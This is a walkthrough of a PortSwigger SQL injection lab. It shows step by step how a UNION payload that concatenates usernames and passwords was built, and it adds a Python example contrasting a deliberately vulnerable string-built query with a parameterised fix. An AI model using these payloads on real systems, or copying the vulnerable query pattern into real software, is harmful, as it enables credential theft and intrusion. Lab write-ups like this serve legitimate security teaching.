Lab: SQL injection UNION attack, retrieving multiple values in a single column
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
Very similar to the previous lab, this is what the landing page of the lab looks like.
We know there’s a SQL injection vulnerability in the product category filter. Before selecting a category, I turned on Intercept in Burp Suite, then selected the Pets category.
Send the intercepted request to Burp Suite Repeater, because we will need to send requests and inspect responses multiple times to figure out the vulnerability and exploit it.
' UNION SELECT NULL, NULL, NULL, NULL from users--
Start with 4 NULLs as placeholders to test whether the original query returns 4 columns (a UNION only works when the injected SELECT has the same number of columns as the original query). Before sending it, apply URL encoding to the payload.
URL encoding applied
4 NULLs and 3 NULLs both returned a 500 Internal Server Error status code.
When the number of NULL placeholders was cut down to 2, it finally returned status code 200.
Replacing the first NULL placeholder with the string value 'A' didn’t work. This indicates that the first column expects a different data type, not a string.
Replacing the second NULL with the same string value worked. As you can see, we got status code 200 as our response.
Then, our SQL query became the following:
' UNION SELECT NULL, username||password from users--
We need both the username and password values, and we know the first column isn’t much use because it doesn’t accept a string. Therefore, we concatenated the username column and the password column, combining the two values into a single output column.
If you see what’s returned on the right, it’s hard to distinguish between the username and password because they’re concatenated without any separator.
Therefore, I added --- as a separator between the username and password. The final query is as follows:
' UNION SELECT NULL, username||'---'||password from users--
Of course, you would need to apply URL encoding on the query if you need to pass this query in a URL as I did.
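To make the root cause concrete, here is an added example (not code from the lab or from PortSwigger) of the two ways a category filter can be written: one that builds the SQL by string concatenation, which is what the lab's behaviour implies, and one that uses a bound parameter. Both run against an in-memory SQLite database with constructed sample rows; the table and column names (products, users, username, password) follow the lab description, the `released` column and the sample values are assumptions. Note that SQLite is loosely typed, so the 'A' type probe from the write-up would not produce a 500 here; the column-count and concatenation behaviour is the same.

```python
"""Vulnerable vs. parameterised product-category filter, run on SQLite.

Added example for the UNION/concatenation write-up above; not the lab's code.
"""
import sqlite3
from urllib.parse import quote

# Constructed sample data (not real credentials).
SAMPLE_PRODUCTS = [(1, "Hamster wheel", "Pets", 1), (2, "Desk lamp", "Home", 1)]
SAMPLE_USERS = [("administrator", "placeholder-admin-pw"), ("wiener", "peter")]

# The final payload from the write-up: two columns, strings joined with '---'.
PAYLOAD = "' UNION SELECT NULL, username||'---'||password from users--"


def make_db():
    """Create an in-memory database shaped like the lab description."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER, name TEXT, category TEXT, released INTEGER);
        CREATE TABLE users (username TEXT, password TEXT);
        """
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?)", SAMPLE_PRODUCTS)
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_filter(conn, category):
    """Builds the query by string formatting: user input becomes SQL.

    The original query has two columns (integer id, text name), which is why
    the write-up needed exactly two NULL placeholders.
    """
    sql = (
        "SELECT id, name FROM products "
        f"WHERE category = '{category}' AND released = 1"
    )
    return conn.execute(sql).fetchall()


def safe_filter(conn, category):
    """Same query with a bound parameter: the input is only ever a value."""
    sql = "SELECT id, name FROM products WHERE category = ? AND released = 1"
    return conn.execute(sql, (category,)).fetchall()


def encoded_payload():
    """URL-encode the payload as it would have to appear in a query string."""
    return quote(PAYLOAD, safe="")


def parse_leak(rows):
    """Split 'username---password' rows back into a dict (what the write-up
    does by eye); rows without the separator are ignored."""
    creds = {}
    for _, value in rows:
        if isinstance(value, str) and "---" in value:
            user, _, pw = value.partition("---")
            creds[user] = pw
    return creds


if __name__ == "__main__":
    db = make_db()
    print("normal:    ", safe_filter(db, "Pets"))
    print("vulnerable:", parse_leak(vulnerable_filter(db, PAYLOAD)))
    print("safe:      ", safe_filter(db, PAYLOAD))
    print("encoded:   ", encoded_payload())
```

With the parameterised version the whole payload is compared against the category column as a literal string and matches nothing, so the users table never reaches the response; the fix is the bound parameter, not filtering out the word UNION.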
Type in the credentials obtained from the query.
BAM!